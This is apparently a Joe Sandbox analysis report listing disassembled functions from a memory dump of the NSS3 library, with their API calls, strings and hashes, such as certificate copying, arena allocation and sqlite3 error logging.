Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C6EC015

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C6EC032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C6EC04D

Part of subcall function 6C7369E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C736A47
Part of subcall function 6C7369E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C736A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C6EC064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C6EC07B

Part of subcall function 6C6E8980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C6E7310), ref: 6C6E89B8
Part of subcall function 6C6E8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C6E7310), ref: 6C6E89E6
Part of subcall function 6C6E8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C6E8A00
Part of subcall function 6C6E8980: CERT_CopyRDN.NSS3(00000004,00000000,6C6E7310,?,?,00000004,?), ref: 6C6E8A1B
Part of subcall function 6C6E8980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C6E8A74

Part of subcall function 6C6E1D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C6EC097,00000000,000000B0,?), ref: 6C6E1D2C
Part of subcall function 6C6E1D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C6EC09B,00000000,00000000,00000000,?,6C6EC097,00000000,000000B0,?), ref: 6C6E1D3F
Part of subcall function 6C6E1D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C6EC087,00000000,000000B0,?), ref: 6C6E1D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C6EC0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C6EC0C9

Part of subcall function 6C6F2DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C6EC0D2,6C6EC0CE,00000000,-000000D4,?), ref: 6C6F2DF5
Part of subcall function 6C6F2DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C6EC0CE,00000000,-000000D4,?), ref: 6C6F2E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6C6EC0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6EC0E3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: fc7c4e97934c5d8ec3d3a7b2c80ec160156ffa3fc4a867cd8728b67916502498
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: F12108F2A451053BFB006A60AD85FFB3A6C9B0575CF084036FD05CA647FB22D518877A

Function 6C6E2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6E2CDA,?,00000000), ref: 6C6E2E1E

Part of subcall function 6C73FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6E9003,?), ref: 6C73FD91
Part of subcall function 6C73FD80: PORT_Alloc_Util.NSS3(A4686C74,?), ref: 6C73FDA2
Part of subcall function 6C73FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C74,?,?), ref: 6C73FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C6E2E33

Part of subcall function 6C73FD80: free.MOZGLUE(00000000,?,?), ref: 6C73FDD1

TlsGetValue.KERNEL32 ref: 6C6E2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C6E2E5E
PL_HashTableLookup.NSS3(?), ref: 6C6E2E71
PL_HashTableRemove.NSS3(?), ref: 6C6E2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C6E2E96
PR_Unlock.NSS3 ref: 6C6E2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6E2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6E2EC5

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: ffece616ccbb06a1584d2eb89d7bca0bf6c94b19b4d58983dbedd9f7ff08eb2f
Instruction ID: 15b6b63c461d82d2ffc7cfa1b1b9a59fdc2c19791353082d96645406bac535de
Opcode Fuzzy Hash: ffece616ccbb06a1584d2eb89d7bca0bf6c94b19b4d58983dbedd9f7ff08eb2f
Instruction Fuzzy Hash: 43213A72A0412167DF212B24EC0EA9B3BB5DB4635DF054031ED18C6712F732D559C6E5

Function 6C6CFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C6CFD18
sqlite3_initialize.NSS3 ref: 6C6CFD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6CFD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C6CFD99
sqlite3_free.NSS3(00000000), ref: 6C6CFE3C
sqlite3_free.NSS3(?), ref: 6C6CFEE3
sqlite3_free.NSS3(?), ref: 6C6CFEEE

Strings

simple, xrefs: 6C6CFC79

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: 5bf01785e82eca75524ee5405a099ef98931b3f5755e3f193710baf0138706db
Instruction ID: ac4d895bad7283dba9fd7302791d702582bc8e74df6241229f2f73f93e98a2a4
Opcode Fuzzy Hash: 5bf01785e82eca75524ee5405a099ef98931b3f5755e3f193710baf0138706db
Instruction Fuzzy Hash: 759192B0B012059FDB04CF55C984AAAF7F1FF89318F25C568D8199BB52E731E842CB96

Function 6C6D5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6D5EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6D5EED

Strings

%s at line %d of [%.10s], xrefs: 6C6D5EE0
misuse, xrefs: 6C6D5EDB
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6D5ED1
API call with %s database connection pointer, xrefs: 6C6D5EC3
invalid, xrefs: 6C6D5EBE
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C6D5E64

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 2e83837d6b986e4b80e3d1d1fbe7fc5ef076ac957b926cab546d60e20b22918c
Instruction ID: 7a5e23fdf00a4304b340b570d65e93640d9a85afca6dfe26301e0e810b56eddb
Opcode Fuzzy Hash: 2e83837d6b986e4b80e3d1d1fbe7fc5ef076ac957b926cab546d60e20b22918c
Instruction Fuzzy Hash: AB819EB0A056129BEB199F15C848BAAB7A0FF4130CF1A4669D8155BF51D730F842CBEE

Function 6C6BDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6BDDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6BDE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6BDE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C6BDEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6BDF78

Strings

database corruption, xrefs: 6C6BDE5C, 6C6BDE8B
%s at line %d of [%.10s], xrefs: 6C6BDE61, 6C6BDE90
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6BDE52, 6C6BDE81

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 5dfb0a9d207548b9a0726cd0732e30567c49f42f39488b987e5d307c10996a1f
Instruction ID: b946d18841d9fa16cad940010c1f718727620f0e352a6c90de850bc8d3aa794d
Opcode Fuzzy Hash: 5dfb0a9d207548b9a0726cd0732e30567c49f42f39488b987e5d307c10996a1f
Instruction Fuzzy Hash: 7181F3706083009FD714CF25C880B6A77F1AF85308F14882DF99A9FB56E735E856CB9A

Function 6C66CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C66B999), ref: 6C66CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C66B999), ref: 6C66D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C66B999), ref: 6C66D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C66B999), ref: 6C7B972B

Strings

database corruption, xrefs: 6C66CFE7, 6C66D013, 6C66D028, 6C66D039, 6C66D03E, 6C7B9786
%s at line %d of [%.10s], xrefs: 6C66CFEC, 6C66D018, 6C66D029, 6C66D03F, 6C7B978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C66CFDD, 6C66D00E, 6C66D022, 6C66D033, 6C7B9780

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 42c5af447d2d5d81938af575dabd78e7ffa7a9c4645c3fd27949b338acbbf88b
Instruction ID: 46ba904726d790a898bfaf2ad9f3d9804953bd5c97ce7b9bfe9ec5066b0fbbff
Opcode Fuzzy Hash: 42c5af447d2d5d81938af575dabd78e7ffa7a9c4645c3fd27949b338acbbf88b
Instruction Fuzzy Hash: 53614871A042109BD320CF2AC940BA7B7F1EFA6318F28456DE4499BF42D37AD946C7E5

Function 6C76FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C775B40: PR_GetIdentitiesLayer.NSS3 ref: 6C775B56

PK11_FreeSymKey.NSS3(00000000), ref: 6C770113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C770130
PORT_Alloc_Util.NSS3(00000040), ref: 6C77015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C7701AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6C770202
free.MOZGLUE(?), ref: 6C770224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C770253

Strings

exporter, xrefs: 6C7700F7

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: 0589e968602611ad47f424f806633c954b7934388e889fe4fb00399f64fa052d
Instruction ID: d0aed5c6268e0302407ec65d5587b1fab1a3e1d72662d9e7e2b64c0e3dcb28ef
Opcode Fuzzy Hash: 0589e968602611ad47f424f806633c954b7934388e889fe4fb00399f64fa052d
Instruction Fuzzy Hash: C26135B190038D9BEF218FA4CE08BEE73B6BF4434CF144238ED1A56A61E7329954C760

Function 6C744DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C74536F,00000022,?,?,00000000,?), ref: 6C744E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C744F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C744F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C744FAE
free.MOZGLUE(?), ref: 6C744FC8

Strings

oStl", xrefs: 6C744DFB, 6C744EF4, 6C744EC5
%s=%s, xrefs: 6C744F89
%s=%c%s%c, xrefs: 6C744FA9

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oStl"
API String ID: 2709355791-1942884824
Opcode ID: 5809dc4d30e9a4aff8cf046b9d42a8de44e5cdd68947ac9879ec52b778548291
Instruction ID: c3a730817fbf626f8632864e871ea8c1a4ac20f042992fe9b5e72e0aa1890116
Opcode Fuzzy Hash: 5809dc4d30e9a4aff8cf046b9d42a8de44e5cdd68947ac9879ec52b778548291
Instruction Fuzzy Hash: 9B513971A451668BEB01CE69C690BFFBBF99F42308F18C135E894A7B41D3359805B791

Function 6C76EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C78A4A1,?,00000000,?,00000001), ref: 6C76EF6D

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

htonl.WSOCK32(00000000,?,6C78A4A1,?,00000000,?,00000001), ref: 6C76EFE4
htonl.WSOCK32(?,00000000,?,6C78A4A1,?,00000000,?,00000001), ref: 6C76EFF1
memcpy.VCRUNTIME140(?,?,6C78A4A1,?,00000000,?,6C78A4A1,?,00000000,?,00000001), ref: 6C76F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C78A4A1,?,00000000,?,00000001), ref: 6C76F027

Strings

dtls13, xrefs: 6C76EF33

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 3357d2453b0c2e2833c6462b426b1282135fca0379ba469c225451bda7c19a9a
Instruction ID: 68fd478c3d6c7806131f1e0f7991f0c3741d68227a43ece8dd1d488e7102a1e9
Opcode Fuzzy Hash: 3357d2453b0c2e2833c6462b426b1282135fca0379ba469c225451bda7c19a9a
Instruction Fuzzy Hash: AC310371A01219AFC710CF29DE84B8AB7E4AF48358F158139EC189BB51E731E916CBE1

Function 6C6EAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6EAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C809500,6C6E3F91), ref: 6C6EAFD2

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

DER_GetInteger_Util.NSS3(?), ref: 6C6EB007

Part of subcall function 6C736A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C6E1666,?,6C6EB00C,?), ref: 6C736AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C6EB02F
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6EB046
PL_FreeArenaPool.NSS3 ref: 6C6EB058
PL_FinishArenaPool.NSS3 ref: 6C6EB060

Strings

security, xrefs: 6C6EAFB8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 5985b6952f5341fb2e680357223e4ca545159a05b3b88126f1eff58b55e4acfa
Instruction ID: ea965d549c7dac46bc0743061d91b55e062474322117c05270faea8eacbdf0a3
Opcode Fuzzy Hash: 5985b6952f5341fb2e680357223e4ca545159a05b3b88126f1eff58b55e4acfa
Instruction Fuzzy Hash: F9310C7140930097D7208F14DD48BAA77A4AF8A36CF144619E97497BD1E336A109C79F

Function 6C6E3E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6C6E40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6E3F7F,?,00000055,?,?,6C6E1666,?,?), ref: 6C6E40D9
Part of subcall function 6C6E40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C6E1666,?,?), ref: 6C6E40FC
Part of subcall function 6C6E40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C6E1666,?,?), ref: 6C6E4138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E3EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6E3ED6

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6E3EEE

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6E3F02
PL_FreeArenaPool.NSS3 ref: 6C6E3F14
PL_FinishArenaPool.NSS3 ref: 6C6E3F1C

Part of subcall function 6C7464F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C74127C,00000000,00000000,00000000), ref: 6C74650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6E3F27

Strings

security, xrefs: 6C6E3EBC

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: a661067d5343bc31dab5178c79bc7f67d824bcc43e5ccb7c614eb05b7e791a4d
Instruction ID: ce332971befb93bbd2a631adbf37747878536cff86752e1ffb3cbeecb6689a12
Opcode Fuzzy Hash: a661067d5343bc31dab5178c79bc7f67d824bcc43e5ccb7c614eb05b7e791a4d
Instruction Fuzzy Hash: 2D213AB2908300ABD7149B15AD05FAB77A8BB4930CF00493DF959A7B42F731E618C79A

Function 6C72CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C72CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C72CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C72D079

